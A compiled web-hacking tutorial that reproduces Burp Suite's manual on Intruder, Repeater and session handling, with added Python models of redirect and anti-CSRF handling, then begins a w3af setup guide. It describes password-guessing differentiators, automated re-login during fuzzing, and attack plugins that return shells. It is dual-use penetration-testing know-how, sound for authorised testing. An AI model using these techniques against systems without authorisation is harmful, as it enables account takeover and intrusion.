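With process_cookies off, every result row would read "Session expired" and the attack would be blind to the login outcome; with it on, the "Login failed" text becomes a usable match-grep differentiator. The max_hops cap mirrors Intruder's limit of 10 and protects the attack from a redirect loop.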

Launching an attack
To create a new attack, use the control panel tabs to set the required configuration,
then select "start attack" from the Intruder menu. To load a saved attack, select "open
saved attack" from the Intruder menu, and choose the required file.
When a new attack is executed, various validation checks are performed on the
specified configuration. This includes verifying that payload position(s) and payload
set(s) are correctly defined, that timing and grep settings are valid, etc. Some failures
generate errors which prevent the attack from executing; others generate warnings
which may be ignored.
Each attack opens in a separate window. This window displays the results of the attack
as they are generated, enables you to modify the attack configuration in real time, and
also contains a number of options for controlling the attack, and saving the results,
server responses and the attack itself.
Note: When modifying the live configuration of a running attack, you should proceed
with caution and consider pausing the attack before making changes.

Results tab
The following is an example of the results view for an attack performing basic content
enumeration on a target website:

This attack uses the sniper attack type (see Positions tab) to make requests for a series
of common names of web directories. For this attack type, the results view displays by
default the number of each request, the payload position used (if more than one is
configured), the payload inserted, the HTTP status code received from the server,
whether or not an error or timeout occurred, and the length of the server's response.
Additional results columns that can be displayed include the "received response" and
"finished response" timers for each request, and any cookies received. Various
configuration options, such as the grep functions, will cause additional columns to
appear in the results view. Columns can be hidden or revealed using the "view" menu.
The set of results can be sorted according to the contents of any results column by

clicking on the relevant header (and reverse-sorted by shift-clicking the header). You
can copy the contents of a column by ctrl-clicking the header [Pro version].
A key part of effectively interpreting the results of an attack is locating interesting or
successful server responses, and identifying the requests which generated these.
Interesting responses can usually be differentiated through at least one of the following:
- a different HTTP status code;
- a different length of response;
- the presence or absence of certain expressions;
- the occurrence of an error or timeout; or
- the time taken to receive or complete the response.

For example, in a content discovery exercise, requests for existing resources might return a "200 OK" response of varying lengths, while requests for nonexistent resources might return a "404 Not found" response, or a "200 OK" response containing a fixed-length custom error page. Or in a password guessing attack, failed login attempts might generate a "200 OK" response containing the keywords "login failed", while a successful login might generate a "302 Object moved" response, or a "200 OK" response of a different length containing the word "welcome".
Burp Intruder can provide assistance in identifying any of the above differentiators. The grep functions (see the grep settings under the Options tab) can be used to mark responses containing known keywords, or to extract interesting information from key parts of the page. In the results view, results can be sorted by clicking a column header, or reverse sorted by shift-clicking the header. In the above example, the HTTP status code is the main differentiator of interesting results, and the results have been sorted to pinpoint these.
You can annotate individual or multiple items, by adding comments and highlights:

You can highlight individual items using a drop-down menu on the left-most table
column:

And you can comment individual items in-place by double-clicking and editing the table
cell:

When you have annotated interesting requests, you can use column sorting and display
filters to quickly find these items later.
If the attack was configured to store requests and/or responses, then you can use the preview pane to view these or double-click an individual result to display details of the request and response. This display provides detailed analysis and rendering of each HTTP message. The "previous" and "next" buttons can be used to cycle through the set of results. If the table in the results view has been sorted, then the results will be displayed in the sequence currently showing in that view.

If the attack is configured to follow redirections, all intermediate responses and requests are also displayed, alongside the initial request and final response.
You can use the "action" button to send the request or response to other Burp Suite
tools, such as Repeater. You can also right-click any item in the results table to show a
context menu with various options:

You can send the selected item to other tools, add multiple items to the Suite site map,
annotate items with comments and highlights, or mark items to be re-requested. This
option is useful if network errors or other problems have affected some of the results. If
you have modified the base request template or other options during the attack, items
to be re-requested will be rebuilt with the current configuration if possible. So, for
example, if your application session has been terminated part way through an attack,
you can modify the base request template with a new session token, and re-issue any
failed requests so that they are executed within your new session.
At the top of the results table is a filter bar, which you can use to hide certain results,
based on HTTP status code, search terms, and user-applied annotations:

As well as filtering, you can also permanently delete items from the results, by selecting
one or more items in the results table, and choosing "delete" from the context menu.

Results menus
The results view contains several menus with commands for controlling the attack, and
saving the results, server responses and the attack itself. These are described below.

Attack menu
This contains commands to pause, resume, or repeat the attack.

Save menu
- attack - This is used to save a copy of the current attack, including results. The saved file can be loaded for further use from within the Burp Intruder control panel.
- results table - This is used to save the results table as a text file. Individual rows and columns can be selected, or the entire table can be saved. The field delimiter can also be configured. This function is useful for exporting the results into a spreadsheet for further analysis, or for saving a single column (such as data mined using the extract grep function) to be used as an input file for subsequent attacks or other tools.
- server responses - This is used to save the full responses received from the server to all requests. These can either be saved in individual files (sequentially numbered), or concatenated in sequence into a single file.
- attack configuration - This is used to save the configuration of the currently executing attack (not the results), enabling you to load that configuration into the main Intruder control panel to configure the same or a similar attack.

View menu
This contains commands to view or hide each of the available data columns in the
results table (the columns available depend upon the configuration of the current
attack).

Using Burp Repeater
Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests,
and analysing their responses. It is best used in conjunction with the other Burp Suite
tools. For example, you can send a request to Repeater from the target site map, from
the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and
manually adjust the request to fine-tune an attack or probe for vulnerabilities.

When you send a request to Repeater from another tool, that request gets its own tab.
Each tab has its own request and response windows, and its own history. The top half of
the panel allows you to configure the target host and port, and the details of your
request. You can complete this information manually, however when you send a request
from another Burp Suite tool the relevant details are all completed for you:

When you have configured a request, click the "go" button to send it to the server. The
response is displayed in the bottom half of the display. For both requests and
responses, various views of the message are available:

raw - This displays the message in plain text form. At the bottom of the text
pane is a search and highlight function which can be used to quickly locate interesting
strings within the message, such as error messages. An options pop-up on the left of
the search bar lets you control case sensitivity, and whether to use simple text or regex
search.

params - For requests containing parameters (within the URL query string, the
Cookie header, or the message body), this tab analyses the parameters into
name/value pairs and allows these to be easily viewed and modified.

headers - This shows the HTTP headers of the message as name/value pairs,
and also displays any message body in raw form.

hex - This allows direct editing of the raw binary data that make up the
message. Certain types of traffic (e.g. browser requests with MIME-encoded parts)
contain binary content that may be corrupted if modified in the text editor. To modify
this type of message, the hex editor should be used.

HTML / XML - For responses containing content in these formats, this provides
a syntax-colourised view of the message body.

render - For responses containing HTML or image content, this renders the
content in visual form, as it would appear within your browser.

AMF - For requests and responses in Action Message Format, this displays a tree
view of the decoded message. If editable, you can double-click individual nodes in the
tree to modify their values.

viewstate - For requests containing an ASP.NET ViewState parameter, this
deserialises the contents of the ViewState, enabling you to review the data contained
for any sensitive items. It also indicates whether the ViewState MAC option is enabled
(and therefore whether the ViewState can be modified).

Right-clicking on any request or response produces a context menu that can be used to
perform various actions:

send to - You can send any message, or a selected portion of the message, to
other tools within Burp Suite, to perform further attacks or analysis.

find references - [Pro version only] You can use this function to search all of
Burp's tools for HTTP responses which link to the selected item.

discover content - [Pro version only] You can use this function to discover
content and functionality which is not linked from visible content which you can browse
to or spider.

schedule task - [Pro version] You can use this function to create tasks which
will run automatically at defined times and intervals.

change request method - For requests, you can automatically switch the
request method between GET and POST, with all relevant request parameters suitably
relocated within the request. This option can be used to quickly test the application's
tolerance of parameter location in potentially malicious requests (e.g. cross-site
scripting).

change body encoding - For requests, you can switch the encoding of any
message body between application/x-www-form-urlencoded and multipart/form-data.

copy URL - This function copies the full current URL to the clipboard.

copy to file - This function allows you to select a file and copy the contents of
the message to the file. This is handy for binary content, when copying via the
clipboard may cause problems. Copying operates on the selected text or, if nothing is
selected, the whole message.

paste from file - This function allows you to select a file and paste the contents
of the file into the message. This is handy for binary content, when pasting via the
clipboard may cause problems. Pasting replaces the selected text or, if nothing is
selected, inserts at the cursor position.

save item - This function lets you specify a file to save the selected request and
response in XML format, including all relevant metadata such as response length, HTTP
status code and MIME type.

convert selection - These functions enable you to perform quick encoding or
decoding of the selected text in a variety of schemes.

URL-encode as you type - If this option is turned on then characters like & and
= will be automatically replaced with their URL-encoded equivalents as you type.
You can use the "<" and ">" buttons to browse back and forwards through the request
history for the current tab, and modify and reissue any individual request, as necessary.

Options
The "repeater" menu controls aspects of Burp Repeater's behaviour.
You can create a new blank tab, delete an existing tab, or rename a tab's caption to
help you keep track of your work.
If the "update Content-Length header" box is checked, then Burp Repeater will update
the Content-Length header of each request (or add the header if necessary), with the
correct value for the length of the HTTP body of that particular request. This feature is
useful where the HTTP body has been manually modified, and so may have changed
length. The HTTP specification, and most web servers, require the correct value for the
length of the HTTP body to be specified using the Content-Length header. If the correct
value is not specified, then the target server may return an error, may respond to an
incomplete request, or may wait indefinitely for further data to be received in the
request.
If the "unpack gzip / deflate" box is checked, then Burp Repeater will decompress gzip- and deflate-compressed content before displaying it.
The redirect settings control whether Burp Repeater will follow HTTP redirects (i.e.
those with a 3xx status code and a Location header containing a new URL). The
following options are available:

Never - Repeater will not follow any redirects.

On-site only - Repeater will only follow redirects to the same web "site", i.e. to
URLs employing the same host, port and protocol as was used in the original request.

In-scope only - Repeater will only follow to URLs that are within the Suite-wide
target scope (defined in the "target" tab).

Always - Repeater will follow redirects to any URL whatsoever. You should use
this option with caution - occasionally, web applications relay your request parameters
in redirections to third-party web sites, and by following redirects you may
inadvertently attack an application that you do not intend to.
When Repeater receives a redirect that it is configured to follow, it will request the
redirection URL (following up to 10 redirections if necessary, after which it stops so as
to avoid infinite loops). The response from the redirection URL is then displayed in the
response panel. The status message will indicate if a redirection was followed, and if so
how many.
The option to follow redirects is often useful when an application returns a 3xx response
to various kinds of input, with the more interesting features of the application's
processing of your request being returned when the redirection target is requested. For
example, when probing for common vulnerabilities, the application may frequently
return a redirect to an error page - this page may contain useful information about the
nature of the error which can be used to diagnose bugs like SQL injection.
If the "process cookies in redirects" option is selected, then any cookies set in the 3xx
response will be resubmitted if a redirect to the same domain is followed.
Note that when Burp Repeater receives a redirection response which it is not configured
to follow automatically, it will display a "follow redirect" button near to the top of the
Repeater interface. This allows you to manually follow the redirect after viewing it. This
feature is useful for walking through each request and response in a redirection
sequence. New cookies will be processed in these manual redirects if this option has
been set in the "process cookies" configuration described above.
The "action" sub-menu contains the same context-menu items as are available by right-clicking the request or response panels.
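The redirect options above, modelled in Python as an added example (this is not Burp's or PortSwigger's code): the four policies, the 10-redirect cap and the "process cookies in redirects" behaviour, run against a constructed in-memory server so it works offline. All hosts, paths and cookie names are made up.

```python
"""Added example, not Burp's code: a model of Burp Repeater's redirect-following
options (never / on-site only / in-scope only / always), its 10-redirect cap and
the "process cookies in redirects" option, over a constructed in-memory server."""
from urllib.parse import urljoin, urlsplit

MAX_REDIRECTS = 10   # Repeater stops after 10 redirections to avoid infinite loops


def site_of(url):
    """A 'site' in the page's sense: the same scheme, host and port."""
    p = urlsplit(url)
    return (p.scheme, p.hostname, p.port or (443 if p.scheme == "https" else 80))


def redirect_allowed(policy, original_url, target_url, scope_hosts=()):
    """Decide whether a Location target may be followed under `policy`."""
    if policy == "never":
        return False
    if policy == "on-site only":
        return site_of(target_url) == site_of(original_url)
    if policy == "in-scope only":          # the Suite-wide target scope, by host
        return urlsplit(target_url).hostname in set(scope_hosts)
    if policy == "always":
        return True
    raise ValueError(f"unknown redirect policy: {policy}")


def issue(url, server, policy, scope_hosts=(), process_cookies=False):
    """Send `url` through `server` (a callable (url, cookies) -> (status, headers,
    body) standing in for the network) and follow redirects as Repeater would.
    Returns (final_status, final_url, redirects_followed, body)."""
    cookies = {}
    current, hops = url, 0
    while True:
        status, headers, body = server(current, cookies)
        location = headers.get("Location")
        if not (300 <= status < 400 and location and hops < MAX_REDIRECTS):
            return status, current, hops, body
        target = urljoin(current, location)
        if not redirect_allowed(policy, url, target, scope_hosts):
            return status, current, hops, body      # shown as a 3xx, not followed
        # cookies set by the 3xx are kept only when the redirect stays on the same domain
        if process_cookies and urlsplit(target).hostname == urlsplit(current).hostname:
            cookies.update(headers.get("Set-Cookie", {}))
        current, hops = target, hops + 1


def demo_server(url, cookies):
    """Constructed routes: an in-site redirect that sets a cookie the next page
    needs, an off-site redirect that relays the query string to a third party
    (the caveat under "Always"), and a redirect loop."""
    p = urlsplit(url)
    routes = {
        ("app.example", "/login-check"):
            (302, {"Location": "/home", "Set-Cookie": {"flash": "1"}}, ""),
        ("app.example", "/home"):
            (200, {}, "home") if cookies.get("flash") == "1" else (401, {}, "no flash cookie"),
        ("app.example", "/offsite"):
            (302, {"Location": "https://partner.example/landing?" + p.query}, ""),
        ("partner.example", "/landing"):
            (200, {}, "partner got: " + p.query),
        ("app.example", "/loop"):
            (302, {"Location": "/loop"}, ""),
    }
    return routes.get((p.hostname, p.path), (404, {}, "not found"))
```

With "always", the request parameters of /offsite end up at partner.example, which is exactly the third-party relay the page warns about.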

Session handling challenges


Some problems commonly encountered when performing any kind of fuzzing or
scanning of web applications are:

The application terminates the session being used for testing, either defensively
or for other reasons, and the remainder of the testing exercise is ineffective.

Some functions use changing tokens that must be supplied with each request
(for example, to prevent request forgery attacks).

Some functions require a series of other requests to be made before the request
being tested, to get the application into a suitable state for it to accept the request
being tested.
All of these problems can also arise when you are testing manually, and resolving them
manually is often tedious, reducing your appetite for further testing.
Burp contains a range of features to help in all of these situations, letting you continue
your manual and automated testing while Burp takes care of the problems for you in
the background. All of the session-related configuration can be found in the "sessions"
tab, within the main "options" tab.

Burp's cookie jar


Burp maintains a cookie jar which tracks the cookies being used in your various
application sessions. The cookie jar is shared between all Burp's tools. Cookies set in
responses are stored in the cookie jar, and can be automatically added to outgoing
requests.
All of this is configurable so, for example, you can update the cookie jar for cookies
received by the Proxy and Spider, and have Burp automatically add cookies to requests
sent by the Scanner and Repeater. The cookie jar configuration is shown in the
"sessions" tab within the main "options" tab:

As shown, by default the cookie jar is updated based on traffic from the Proxy and
Spider tools. You can view the contents of the cookie jar and edit cookies manually if
you wish:

For all tools other than the Proxy, HTTP responses are examined to identify new
cookies. In the case of the Proxy, incoming requests from the browser are also
inspected. This is useful where an application has previously set a persistent cookie
which is present in your browser, and which is required for proper handling of your
session. Having Burp update its cookie jar based on requests through the Proxy means
that all the necessary cookies will be added to the cookie jar even if the application
does not update the value of this cookie during your current visit.
Burp's cookie jar honours the domain scope of cookies, in a way that mimics Internet
Explorer's interpretation of cookie handling specifications. Path scope is not honoured.

Session handling rules

Burp lets you define a list of session handling rules, which give you very fine-grained
control over how Burp deals with an application's session handling mechanism and
related functionality. These rules are configured in the "sessions" tab within the main
"options" tab:

Each rule comprises a scope (what the rule applies to) and actions (what the rule does).
For every outgoing request that Burp makes, it determines which of the defined rules
are in-scope for the request, and performs all of those rules' actions in order (unless a
condition-checking action determines that no further actions should be applied to the
request).
The scope for each rule can be defined based on any or all of the following features of
the request being processed:

The Burp tool that is making the request.

The URL of the request.

The names of parameters within the request.


Each rule can perform one or more actions. The following actions are implemented:

Add cookies from the session handling cookie jar.

Set a specific cookie or parameter value.

Check whether the current session is valid, and perform sub-actions conditionally
on the result.

Prompt the user for in-browser session recovery.

Run a macro.

Run a post-request macro (this issues the current request, and then executes a
further macro).
All of these actions are highly configurable, and can be combined in arbitrary ways to
handle virtually any session handling mechanism. Being able to run arbitrary macros
(defined request sequences), and update specified cookie and parameter values based
on the result, allows you to automatically log back in to an application part way through
an automated scan or Intruder attack. Being able to prompt for in-browser session
recovery enables you to work with login mechanisms that involve keying a number from
a physical token, or solving a CAPTCHA-style puzzle.
By creating multiple rules with different scopes and actions, you can define a hierarchy
of behaviour that Burp will apply to different applications and functions. For example,
on a particular test you could define the following rules:

For all requests, add cookies from Burp's cookie jar.

For requests to a specific domain, validate that the current session with that
application is still active, and if not, run a macro to log back in to the application, and
update the cookie jar with the resulting session token.

For requests to a specific URL containing the __csrftoken parameter, first run a
macro to obtain a valid __csrftoken value, and use this when making the request.
The details of how to configure Burp to achieve this are described in later sections.

Macros
A key part of Burp's session handling functionality is the ability to run macros, as
defined in session handling rules. A macro is a predefined sequence of one or more
requests. Typical use cases for macros include:

Fetching a page of the application (such as the user's home page) to check that
the current session is still valid.

Performing a login to obtain a new valid session.

Obtaining a token or nonce to use as a parameter in another request.

When scanning or fuzzing a request in a multi-step process, performing the
necessary preceding requests, to get the application into a state where the targeted
request will be accepted.

In a multi-step process, after the "attack" request, completing the remaining
steps of the process, to confirm the action being performed, or obtain the result or
error message from the conclusion of that process.
Macros are recorded using your browser. When defining a macro, Burp displays a view
of the Proxy history, from which you can select the requests to be used for the macro.
You can select from previously made requests, or record the macro afresh and select
the new items from the history.
When you have recorded the macro, the macro editor shows the details of the items in
the macro, which you can review and configure as required:

As well as the basic sequence of requests, each macro includes some important
configuration about how items in the sequence should be handled, and any
interdependencies between items:

For each item in the macro, the following settings can be configured:

Whether cookies from the session handling cookie jar should be added to the
request.

Whether cookies received in the response should be added to the session
handling cookie jar.

For each parameter in the request, whether it should use a preset value, or a
value derived from a previous response in the macro.

Whether key characters should be URL-encoded in updated parameter values.


The ability to derive a parameter's value from a previous response in the macro is
particularly useful in some multi-stage processes, and in situations where applications
make aggressive use of anti-CSRF tokens. When a new macro is defined, Burp tries to
automatically find any relationships of this kind, by identifying parameters whose values
can be determined from the preceding response (form field values, redirection targets,
query strings in links, etc.). You can easily review and edit the default macro
configuration applied by Burp before the macro is used. Further, the configured macro
can be tested in isolation, and the full request/response sequence reviewed, to check
that it is functioning in the way you require.

Worked example
Let's look at an application function which can only be accessed within an authenticated
session, and employs a further token to defend against CSRF attacks. You want to test
this function for various input-based vulnerabilities like XSS and SQL injection.
Performing automated (and some manual) testing of this function faces two challenges:
(a) ensuring that the session being used remains valid; and (b) obtaining a valid token
to use in each request. Burp's session handling functionality can take care of both these
challenges.
To do this, we're going to define some session handling rules. These rules will be
applied to each request that is made to the function we are testing by the Intruder,
Scanner and Repeater tools:

Check whether the current session is valid, by requesting the user's landing page
in the application, and inspecting the response to confirm that the user is still logged in.

If the user is not logged in, log them back in to obtain a valid session.

Request the page containing the form whose submission we are going to test.
This form contains the anti-CSRF token that we need, within a hidden field.

Update the request to the function we are testing with the value of the anti-CSRF
token.
In most situations, we need to make use of Burp's own session handling cookie jar, so
the first rule we define tells Burp to add cookies from the cookie jar to every request.
This is, in fact, the default rule for the Scanner and Spider tools, so we'll just modify the
default rule to apply to the Intruder and Repeater tools as well. This rule performs a
single action, shown below:

The rule's scope is defined to include the relevant tools, and apply to all URLs:

Next, we need to check that the user's current session on the target application is valid.
Assuming we want to apply this rule to all requests within the target application, we can
define it to be in-scope for the whole of the application's domain:

We then add a suitable description and add an action of the type "check session is
valid":

This opens the editor for this type of action, which contains a lot of configuration
options:

The first set of options determines which request Burp uses to validate the current
session. The options are:

Issue the actual request that is currently being processed. This option is ideal if
the application always responds to out-of-session requests with a common response
signature, such as a redirection to the login.

Run a macro, to make one or more other requests. This option is ideal if, to
identify whether the session is valid, you need to request a standard item, such as the
user's home page. It is also the best option if you need to apply further rules to modify
the request currently being processed - for example (as in the present case) to update
an anti-CSRF token in the request. If the option to run a macro is selected, you have a
further option whether to do this for every request, or only every N requests. If
the application is aggressive in terminating sessions in response to unexpected input, it
is recommended that you validate the session every time; otherwise, you can speed
things up by only validating the session periodically.

For the current example, we are going to run a macro to fetch the user's landing page
in the application, to check that their session is valid. To do this, we need to define our
macro, by clicking on the "new" button in the previous screenshot. This opens the
macro recorder, enabling us to select the request(s) that we wish to include in the
macro. In the present case, we only need to select the GET request for the user's
landing page:

The second set of options in the "check session is valid" action controls how Burp
inspects the (final) response from the macro to determine whether the session is valid.
Various options are available, and the configuration we need in the present case is
shown below:

The final set of options for this action determines how Burp will behave depending on
whether the current session is valid:

You can tell Burp not to perform any further actions for this request if the session
is valid. Using this option lets you define subsequent, separate actions to recover a valid
session. This option is mandatory if the request itself has already been issued in order
to determine whether the session is valid.

You can tell Burp to perform a sub-action if the session is invalid, and then
continue to process subsequent actions. This is useful when you need to define
subsequent actions in any case, following the session validity check, for example to run
a macro to obtain a request token or modify the application's state.
In the present example, we need to use the second option. If the session is invalid, we
will run a macro to log the user back in. We need to record a further macro, to perform
the actual login, and tell Burp to run this macro and update the session handling cookie
jar based on the results:

At this point, we have configured Burp to update requests with cookies from its cookie
jar, and to log the user back in to the target application when their session is invalid. To
complete the required configuration, we need to define a further rule to deal with the
anti-CSRF token used in the function we want to test. The request we are testing looks
like this:
POST /auth/4/NewUserStep2.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: mdsec.net
Content-Length: 137
Cookie: SessionId=39DD9F0CB979BFB431005524A4010244

realname=testuser&username=testuser&userrole=user&password=letmein1&confirmpassword=letmein1&nonce=938549246127349541173

To ensure that our requests to this function are properly handled, we need to ensure
that a valid nonce is supplied with each request. The value of this nonce is supplied by
the application in a hidden field within the form that generates the above request. So
our rule needs to run a macro to fetch the page containing the form, and update the
current request with the value of the nonce parameter. We add a further rule with an
action of the type "run macro" and configure it as follows:

In the above configuration, we have specified that Burp should run a new macro, which
fetches the form containing the anti-CSRF token, and then obtain the nonce parameter
from the (final) macro response, and update this in the request. Alternatively, we could
select the "update all parameters" option, and Burp would automatically attempt to
match parameters in the request with those specified in the macro response.
In terms of the scope for this rule, this obviously needs to be defined more narrowly
than the whole application domain. For example, we could define the rule to apply only
to the exact URL in the above request. This is the best option if the application only
employs anti-CSRF tokens in a few locations. However, in some applications, tokens are
used for a large number of functions, and a token obtained within one function can be
submitted within a different function. In this situation, we could define a rule that
applies to the whole domain, but only to requests containing a specified parameter
name. In this way, any time a request is made to the application that contains an
anti-CSRF token, the rule will execute and Burp will fetch a new valid token to use in the
request.
The full configuration, with its three session handling rules and three macros, looks like
this within the main Burp UI:

You can test the configuration is working by logging out of the application, sending the
authenticated, token-protected request to Burp Repeater, and verifying that it performs
the required action. The request will probably take longer to return than normal,
because behind the scenes Burp is making several other requests, to validate your
session, log in again if necessary, and obtain a token to use in the request.
If you find your rules are not working in the way you intended, you can use the session
handling tracer to troubleshoot the problem.

Once you are happy that your session handling rules are working correctly, you can
send the request to Burp Intruder or Scanner, to perform your automated testing in the
normal way.
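The three rules of this worked example, modelled in Python as an added example (not Burp's or PortSwigger's code) against a constructed in-memory stand-in for the target application. The request path /auth/4/NewUserStep2.ashx and the nonce parameter come from the request above; the landing page /home, the login form and the form page /auth/4/NewUserStep1.ashx are assumptions. The example also shows the rule being skipped when the nonce parameter itself is the one being fuzzed, as described under "Integration with Burp tools".

```python
"""Added example, not Burp's code: the worked example's session handling rules
(add cookies from the jar; check the session and log back in if needed; fetch
the form and update the anti-CSRF nonce) against a constructed in-memory app."""
import re
import secrets


class DemoApp:
    """Constructed stand-in for the target application (not a real server).

    It keeps a set of valid SessionId values and a set of unused anti-CSRF
    nonces, and answers the four paths the session handling rules touch."""

    def __init__(self):
        self.sessions = set()   # currently valid SessionId cookie values
        self.nonces = set()     # anti-CSRF tokens issued but not yet consumed

    def handle(self, method, path, params, cookies):
        """Return (status, headers, body); Set-Cookie is modelled as a dict."""
        sid = cookies.get("SessionId")
        if method == "POST" and path == "/login":          # assumed login form
            if params.get("password") != "letmein1":
                return 200, {}, "Bad credentials"
            sid = secrets.token_hex(16)
            self.sessions.add(sid)
            return 302, {"Location": "/home", "Set-Cookie": {"SessionId": sid}}, ""
        if sid not in self.sessions:                        # out of session
            return 302, {"Location": "/login"}, ""
        if path == "/home":                                 # assumed landing page
            return 200, {}, "<h1>Welcome testuser</h1>"
        if path == "/auth/4/NewUserStep1.ashx":             # assumed form page
            nonce = str(secrets.randbelow(10 ** 21))
            self.nonces.add(nonce)
            return 200, {}, f'<input type="hidden" name="nonce" value="{nonce}">'
        if method == "POST" and path == "/auth/4/NewUserStep2.ashx":
            if params.get("nonce") not in self.nonces:
                return 403, {}, "Invalid or reused nonce"
            self.nonces.discard(params["nonce"])            # tokens are single-use
            return 200, {}, "User created: " + params.get("username", "")
        return 404, {}, "Not found"


class SessionHandler:
    """Applies the page's three rules, in order, to every test request."""

    NONCE_RE = re.compile(r'name="nonce" value="([^"]+)"')

    def __init__(self, app):
        self.app = app
        self.cookie_jar = {}    # the shared cookie jar (rule 1 adds it to requests)
        self.trace = []         # what the session handling tracer would show

    def _macro(self, method, path, params=None, update_jar=False):
        """Run a one-request macro with cookies from the jar added."""
        status, headers, body = self.app.handle(
            method, path, params or {}, dict(self.cookie_jar))
        if update_jar:          # macro item configured to update the jar
            self.cookie_jar.update(headers.get("Set-Cookie", {}))
        self.trace.append(f"macro {method} {path} -> {status}")
        return status, headers, body

    def session_is_valid(self):
        """Rule 2: fetch the landing page and look for the logged-in marker."""
        status, _, body = self._macro("GET", "/home")
        return status == 200 and "Welcome" in body

    def login(self):
        """Rule 2 sub-action: run the login macro and update the cookie jar."""
        self._macro("POST", "/login",
                    {"username": "testuser", "password": "letmein1"}, update_jar=True)

    def fresh_nonce(self):
        """Rule 3: fetch the form page and extract the hidden anti-CSRF token."""
        _, _, body = self._macro("GET", "/auth/4/NewUserStep1.ashx")
        match = self.NONCE_RE.search(body)
        return match.group(1) if match else None

    def send(self, method, path, params, fuzzing=None):
        """Issue a test request with all rules applied.  `fuzzing` names the
        parameter currently carrying the payload; as Burp does, a rule that would
        overwrite that parameter is skipped so the payload reaches the application."""
        if not self.session_is_valid():
            self.login()
        if path == "/auth/4/NewUserStep2.ashx" and fuzzing != "nonce":
            params = dict(params, nonce=self.fresh_nonce())
        status, _, body = self.app.handle(method, path, params, dict(self.cookie_jar))
        self.trace.append(f"request {method} {path} -> {status}")
        return status, body
```

Reading `handler.trace` after a request shows the same macro-by-macro sequence the session handling tracer displays, which is the first thing to inspect when a rule does not behave as expected.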

Session handling tracer


The configuration needed to apply Burp's session handling functionality to the features
of real-world applications is often complex, and mistakes are easily made. Burp
provides a tracer function for troubleshooting the session handling configuration. This
shows you all of the steps performed when Burp applies session handling rules to a
request, allowing you to see exactly how requests are being updated and issued. You
can access the session handling tracer via options / sessions / view sessions tracer:

Integration with Burp tools


It is worth noting a few points about how the session handling features affect some of
Burp's other functionality:

There is a default session handling rule which updates all requests made by the
Scanner and Spider with cookies from Burp's cookie jar. This ensures that all spidering
and scanning requests are made in-session, provided you maintain a valid session using
your browser. It also means that items in the active scan queue that are loaded from a
state file will be scanned within your current session, not the session that was active
when the state file was saved. If this is not the behaviour you require, you should
disable the default session handling rule before performing any scanning.

In cases where session handling rules modify a request before it is made (for
example, to update a cookie or other parameter), some of Burp's tools will show the
final, updated request, for purposes of clarity. This applies to the Intruder, Repeater and
Spider tools. Requests that are shown within reported Scanner issues continue to show
the original request, to facilitate clear comparison with the base request, where
necessary. To observe the final request for a scan issue, as modified by the session
handler, you can send the request to Burp Repeater and issue it there.

When the Scanner or Intruder makes a request that manipulates a cookie or
parameter that is affected by a session handling action, the action is not applied to that
request, to avoid interfering with the test that is being performed. For example, if you
are using Intruder to fuzz all the parameters in a request, and you have configured a
session handling rule to update the "sessid" cookie in that request, then the "sessid"
cookie will be updated when Intruder is fuzzing other parameters. When Intruder is
fuzzing the "sessid" cookie itself, Burp will send the Intruder payload string as the
"sessid" value, and will not update it as is done normally.

This means you have gone through all the modules in Burp
Suite. So you have got an idea of how to hack a web application
using Burp Suite, but wait, you forgot that W3AF was in store.

All the Burp Data has been flicked from a place which had the
following message:
Copyright 2010 PortSwigger Ltd. All rights reserved
So thanks to PortSwigger For the Interesting Help Manual for the hackers.

The W3AF Framework:

This part is a guide for the Web Application Attack and Audit
Framework (w3af). Its goal is to provide a basic overview of what
the framework is, how it works and what you can do with it. w3af
is a complete environment for auditing and attacking web
applications. This environment provides a solid platform for
auditing and penetration testing.
I will try to make it precise because it will be a great pain to
copy-paste the materials and put them in a formatted manner.
But I will give what you need to learn the framework. OK
then, it's get set, GO.

Download
The framework can be downloaded from the project main page:
http://w3af.sf.net/#download
There are two ways to install w3af: from a release package (w3af setup for
Windows and tgz package for Unix based systems) or from SVN. First time users
should use the latest package, while more advanced users should perform an SVN
checkout to get the latest version of the framework.

Installation
The framework should work on all platforms supported by Python; in particular,
w3af has been tested on Linux, Windows XP, Windows Vista and OpenBSD. This
user guide will guide you through the installation on a Linux platform; installing
w3af in a Windows box is straightforward if you use the available installer, which
can be downloaded from the official w3af site.

Installation Requirements
The required packages to run w3af can be divided in two groups:
Core requirements:
Python 2.5
fpconst-0.7.2
pygoogle
nltk
SOAPpy
pyPdf
Beautiful Soup
Python OpenSSL
json.py
scapy
Graphical user interface requirements:
python sqlite3
graphviz
pygtk 2.0
gtk 2.12

As you may have guessed, the core requirements are needed to run w3af with
any user interface (console or graphical), and the graphical user interface
requirements are needed only if you plan to use the GTK+ user interface.
Some of the requirements are bundled with the distribution file, in order to make
the installation process easier for the novice user. The bundled requirements can
be found inside the extlib directory. Most of the libraries can be run from that
directory, but some others require an installation process; the installation steps
for these libraries are (as root):

cd w3af
cd extlib
cd fpconst-0.7.2
python setup.py install
cd ..
cd pygoogle
python setup.py install
cd ..
cd nltk
python setup.py install
cd ..
cd SOAPpy
python setup.py install
cd ..
cd pyPdf
python setup.py install

w3af phases
Before even running w3af a user must know how the application is divided and
how plugins are going to be executed. Basically, w3af has three types of plugins:
discovery, audit and attack.
Discovery plugins have only one responsibility, finding new URLs, forms, and other
injection points. A classic example of a discovery plugin is a web spider. This
plugin takes a URL as input and returns one or more injection points. When a user
enables more than one plugin of this type, they work in a loop: if plugin A finds a
new URL in the first run, the w3af core will send that URL to plugin B. If plugin B
then finds a new URL, it will be sent to plugin A. This process will go on until all
plugins are run and no more knowledge about the application can be found using
the enabled discovery plugins.
Audit plugins take the injection points found by discovery plugins and send
specially crafted data to all of them in order to find vulnerabilities. A classic
example of an audit plugin is one that searches for SQL injection vulnerabilities.
Attack plugins' objective is to exploit vulnerabilities found by audit plugins. They
usually return a shell on the remote server, or a dump of remote tables in the
case of SQL injection exploits.

Running w3af
w3af has two user interfaces, the console user interface (consoleUI) and the
graphical user interface (gtkUi). This user guide will focus on the consoleUI, which
is, at the moment of this writing, much more tested and complete than the gtkUi.
To fire up the consoleUI you just have to execute w3af without parameters and
you will get a prompt like this one:

$ ./w3af_console
w3af>>>
From this prompt you will be able to configure the framework, launch scans
and
ultimately exploit a vulnerability. At this point you can start typing
commands, the
first command you have to learn is help (please note that commands are
case
sensitive):
w3af>>> help
||
| start | Start the scan. |
| plugins | Enable and configure plugins. |
| exploit | Exploit the vulnerability. |

| profiles | List and use scan profiles. |


||
| httpsettings
| Configure the http settings of the |
| | framework. |
| miscsettings
